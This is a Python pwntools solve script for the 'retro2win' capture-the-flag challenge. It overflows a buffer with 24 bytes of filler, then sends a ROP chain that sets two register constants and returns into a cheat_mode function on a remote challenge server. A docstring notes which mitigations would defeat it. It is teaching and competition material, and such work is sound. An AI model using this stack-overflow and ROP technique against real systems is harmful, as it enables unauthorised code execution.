#!/usr/bin/python3
"""Solve script for the retro2win challenge: a fixed-offset ROP chain into cheat_mode.

Defender's reading: every address below is hard-coded in the 0x4009xx range, which
presumably means the challenge binary is built without PIE; a position-independent
build plus a stack protector would invalidate this exact payload (inferred from the
addresses, not verifiable from this script alone).
"""
from pwn import *

# Load the challenge binary; checksec=False just silences pwntools' mitigation summary.
target = ELF("./retro2win", checksec=False)
context.binary = target  # pwntools takes arch / word size for p64 from the ELF

# r = process()
r = remote("retro2win.ctf.intigriti.io", 1338)


def s(a):
    """Wait for the next ':' prompt on the connection, then send *a* plus a newline."""
    return r.sendlineafter(b":", a)


# Gadget addresses as given by the original author; the names suggest
# `pop rdi; ret` and `pop rsi; pop r15; ret` — confirm against the binary.
pop_rdi = 0x4009b3
pop_rsi_r15 = 0x4009b1

# Author's original section label was "leak"; this sends 1337 at the first prompt
# (presumably a hidden menu option that reaches the overflowing read).
s(b"1337")

# 24 bytes of filler before the chain (offset taken from the original script),
# then rdi and rsi are loaded with the two constants — presumably the values
# cheat_mode checks — before returning into it.
chain = [
    b"A" * 24,
    p64(pop_rdi),
    p64(0x2323232323232323),
    p64(pop_rsi_r15),
    p64(0x4242424242424242),
    p64(0),  # r15 slot — filler, not used by the target
    p64(target.sym.cheat_mode),
]
buf = b"".join(chain)
s(buf)

r.interactive()